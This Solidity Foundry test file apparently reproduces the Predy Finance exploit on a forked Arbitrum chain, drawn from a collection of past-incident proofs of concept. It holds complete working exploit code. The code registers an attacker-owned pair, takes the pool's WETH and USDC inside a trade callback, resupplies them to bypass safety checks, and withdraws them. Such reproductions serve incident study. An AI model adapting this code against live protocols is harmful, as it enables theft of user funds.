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PredyFinance_exp.sol
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PredyFinance_exp.sol
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// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : $464K
// Attacker : https://arbiscan.io/address/0x76b02ab483482740248e2ab38b5a879a31c6d008
// Attack Contract : https://arbiscan.io/address/0xb79714634895f52a4f6a75eceb58c96246370149
// Vulnerable Contract : https://arbiscan.io/address/0x7b8b944ab2f24c829504a7a6d70fce5298f2147c
// Attack Tx : https://arbiscan.io/tx/0xbe163f651d23f0c9e4d4a443c0cc163134a31a1c2761b60188adcfd33178f50f
// @Info
// Vulnerable Contract Code : https://arbiscan.io/address/0x7b8b944ab2f24c829504a7a6d70fce5298f2147c#code
// @Analysis
// Post-mortem :
// Twitter Guy :
// Hacking God :
pragma solidity ^0.8.0;
contract PredyFinance is BaseTestWithBalanceLog {
uint256 blocknumToForkFrom = 211_107_441;
IERC20 USDC = IERC20(0xaf88d065e77c8cC2239327C5EDb3A432268e5831);
IERC20 WETH = IERC20(0x82aF49447D8a07e3bd95BD0d56f35241523fBab1);
IPredyPool predyPool = IPredyPool(0x9215748657319B17fecb2b5D086A3147BFBC8613);
function setUp() public {
vm.createSelectFork("arbitrum", blocknumToForkFrom);
//Change this to the target token to get token balance of,Keep it address 0 if its ETH that is gotten at the end of the exploit
fundingToken = address(USDC);
vm.label(address(WETH), "WETH");
vm.label(address(USDC), "USDC");
vm.label(address(predyPool), "PredyPool");
}
function testExploit() public balanceLog {
USDC.approve(address(predyPool), type(uint256).max);
WETH.approve(address(predyPool), type(uint256).max);
//implement exploit code here
AddPairLogic.AddPairParams memory addPairParam = AddPairLogic.AddPairParams({
marginId: address(WETH),
poolOwner: address(this),
uniswapPool: address(0xC6962004f452bE9203591991D15f6b388e09E8D0),
priceFeed: address(this),
whitelistEnabled: false,
fee: 0,
assetRiskParams: Perp.AssetRiskParams({
riskRatio: 100_000_001,
debtRiskRatio: 0,
rangeSize: 1000,
rebalanceThreshold: 500,
minSlippage: 1_005_000,
maxSlippage: 1_050_000
}),
quoteIrmParams: InterestRateModel.IRMParams({
baseRate: 10_000_000_000_000_000,
kinkRate: 900_000_000_000_000_000,
slope1: 500_000_000_000_000_000,
slope2: 1_000_000_000_000_000_000
}),
baseIrmParams: InterestRateModel.IRMParams({
baseRate: 10_000_000_000_000_000,
kinkRate: 900_000_000_000_000_000,
slope1: 500_000_000_000_000_000,
slope2: 1_000_000_000_000_000_000
})
});
uint256 pairId = predyPool.registerPair(addPairParam); // register pair, the owner of the pair is attack contract
IPredyPool.TradeParams memory tradeParams =
IPredyPool.TradeParams({pairId: pairId, vaultId: 0, tradeAmount: 0, tradeAmountSqrt: 0, extraData: ""});
predyPool.trade(tradeParams, ""); // set the attack contract as the locker
predyPool.withdraw(pairId, true, WETH.balanceOf(address(predyPool))); // withdraw the LP to the attacker
predyPool.withdraw(pairId, false, USDC.balanceOf(address(predyPool))); // withdraw the LP to the attacker
}
function predyTradeAfterCallback(
IPredyPool.TradeParams memory tradeParams,
IPredyPool.TradeResult memory tradeResult
) external {
predyPool.take(true, address(this), WETH.balanceOf(address(predyPool))); // take the asset to the attacker
predyPool.supply(tradeParams.pairId, true, WETH.balanceOf(address(this))); // supply the asset as LP and bypass the check in the function PositionCalculator.checkSafe()
predyPool.take(false, address(this), USDC.balanceOf(address(predyPool))); // take the asset to the attacker
predyPool.supply(tradeParams.pairId, false, USDC.balanceOf(address(this))); // supply the asset as LP and bypass the check in the function finalizeLock()
}
function getSqrtPrice() external view returns (uint256) {
return 40_000_000_000;
}
}
library AddPairLogic {
struct AddPairParams {
address marginId;
address poolOwner;
address uniswapPool;
address priceFeed;
bool whitelistEnabled;
uint8 fee;
Perp.AssetRiskParams assetRiskParams;
InterestRateModel.IRMParams quoteIrmParams;
InterestRateModel.IRMParams baseIrmParams;
}
}
library Perp {
struct AssetRiskParams {
uint128 riskRatio;
uint128 debtRiskRatio;
int24 rangeSize;
int24 rebalanceThreshold;
uint64 minSlippage;
uint64 maxSlippage;
}
}
library InterestRateModel {
struct IRMParams {
uint256 baseRate;
uint256 kinkRate;
uint256 slope1;
uint256 slope2;
}
}
interface IPredyPool {
struct TradeParams {
uint256 pairId;
uint256 vaultId;
int256 tradeAmount;
int256 tradeAmountSqrt;
bytes extraData;
}
struct TradeResult {
Payoff payoff;
uint256 vaultId;
int256 fee;
int256 minMargin;
int256 averagePrice;
uint256 sqrtTwap;
uint256 sqrtPrice;
}
struct Payoff {
int256 perpEntryUpdate;
int256 sqrtEntryUpdate;
int256 sqrtRebalanceEntryUpdateUnderlying;
int256 sqrtRebalanceEntryUpdateStable;
int256 perpPayoff;
int256 sqrtPayoff;
}
function registerPair(AddPairLogic.AddPairParams memory addPairParam) external returns (uint256);
function trade(
TradeParams memory tradeParams,
bytes memory settlementData
) external returns (TradeResult memory tradeResult);
function take(bool isQuoteAsset, address to, uint256 amount) external;
function supply(
uint256 pairId,
bool isQuoteAsset,
uint256 supplyAmount
) external returns (uint256 finalSuppliedAmount);
function withdraw(
uint256 pairId,
bool isQuoteAsset,
uint256 withdrawAmount
) external returns (uint256 finalBurnAmount, uint256 finalWithdrawAmount);
}